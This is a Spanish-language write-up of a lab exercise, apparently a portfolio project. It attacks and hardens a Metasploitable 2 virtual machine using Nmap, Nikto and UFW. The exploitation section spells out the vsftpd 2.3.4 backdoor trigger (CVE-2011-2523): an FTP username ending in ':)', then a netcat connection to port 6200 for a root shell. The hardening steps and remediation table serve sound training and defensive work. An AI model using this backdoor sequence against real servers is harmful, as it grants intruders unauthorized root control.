
Laboratorio virtual controlado de ataque y defensa — explotación de CVE-2011-2523, reconocimiento con Nmap, escaneo con Nikto, endurecimiento con UFW en Metasploitable 2
Un entorno virtual controlado que simula escenarios reales de ataque y defensa
Este laboratorio simula una prueba de penetración del mundo real y un ejercicio de endurecimiento defensivo en un entorno virtual completamente aislado. Demuestra el ciclo de vida completo de la seguridad ofensiva, desde el reconocimiento hasta la explotación, y los controles defensivos que mitigarían cada riesgo.
Resultado clave: Se obtuvo acceso root completo en la máquina objetivo en menos de 60 segundos explotando una puerta trasera conocida, sin credenciales ni herramientas especiales.
| Componente | Detalles |
|---|---|
| Hipervisor | VMware Workstation |
| Red | Solo anfitrión / NAT (totalmente aislada) |
| SO Atacante | Ubuntu 24 LTS |
| SO Objetivo | Metasploitable 2 (Linux 2.6.x) |
| IP Atacante | 192.168.148.255 |
| IP Objetivo | 192.168.148.130 |
Reconocimiento → Escaneo → Explotación → Defensa y endurecimiento
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
Hallazgos clave — 23 puertos abiertos en total:
| Puerto | Servicio | Versión | Riesgo |
|---|---|---|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 CRÍTICO — Puerta trasera conocida (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 MEDIO — Desactualizado |
| 23 | Telnet | Linux telnetd | 🟠 ALTO — Protocolo en texto plano |
| 80 | HTTP | Apache 2.2.8 | 🟠 ALTO — Múltiples CVE |
| 1524 | Bindshell | Shell root | 🔴 CRÍTICO — Shell root abierto |
| 3306 | MySQL | 5.0.51a | 🟠 ALTO — Base de datos expuesta |
| 5900 | VNC | Protocolo 3.3 | 🟠 ALTO — Autenticación débil |
| 6667 | IRC | UnrealIRCd | 🔴 CRÍTICO — Puerta trasera conocida |
nikto -h http://192.168.148.130 -o nikto_before.txt
18 vulnerabilidades encontradas, incluyendo:
phpinfo.php filtrando la configuración completa del servidor/doc/, /test/vsftpd 2.3.4 contiene una puerta trasera introducida mediante un compromiso en la cadena de suministro. Enviar un nombre de usuario que termine con :) hace que el servidor abra un shell root en el puerto 6200.
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:) Password: anything
# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200
# Step 3 — Verify access
whoami
# → root
Resultado: Se obtuvo acceso completo a nivel de root en < 60 segundos — sin credenciales, sin necesidad de frameworks de explotación.
Impacto: Un atacante con acceso root puede leer/modificar/eliminar cualquier archivo, instalar malware, exfiltrar datos o pivotar a otros hosts en la red.
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # SSH only
sudo ufw status verbose
| Vulnerabilidad | Solución |
|---|---|
| Puerta trasera vsftpd 2.3.4 | Actualizar a vsftpd 3.x o migrar a SFTP |
| Shell root abierto (puerto 1524) | Deshabilitar inmediatamente, auditar la instalación |
| Telnet (puerto 23) | Deshabilitar — forzar solo SSH |
| phpMyAdmin expuesto | Restringir por IP, requerir autenticación fuerte |
| MySQL expuesto (puerto 3306) | Enlazar a localhost, bloquear acceso externo |
| VNC expuesto (puerto 5900) | Restringir por IP o deshabilitar |
| Indexación de directorios | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| Apache + PHP desactualizados | Actualizar a versiones LTS soportadas |
Consulte report.md para la evaluación completa: metodología completa, salidas de comandos, tabla de hallazgos, pasos de explotación y todas las recomendaciones de corrección.
Este laboratorio se realizó en un entorno virtual completamente aislado utilizando software intencionalmente vulnerable (Metasploitable 2). Todas las técnicas son con fines exclusivamente educativos y de portafolio. No las replique en sistemas que no sean de su propiedad o para los que no tenga permiso explícito por escrito.
| Herramienta | Propósito |
|---|---|
| Nmap | Escaneo de puertos y detección de servicios |
| Nikto | Escaneo de vulnerabilidades web |
| Netcat | Conexión al shell de la puerta trasera |
| UFW | Configuración de cortafuegos basado en host |
| Cliente FTP | Desencadenar la puerta trasera de vsftpd |
| VMware Workstation | Virtualización del laboratorio |
Autor: Amir Mohammad Marwi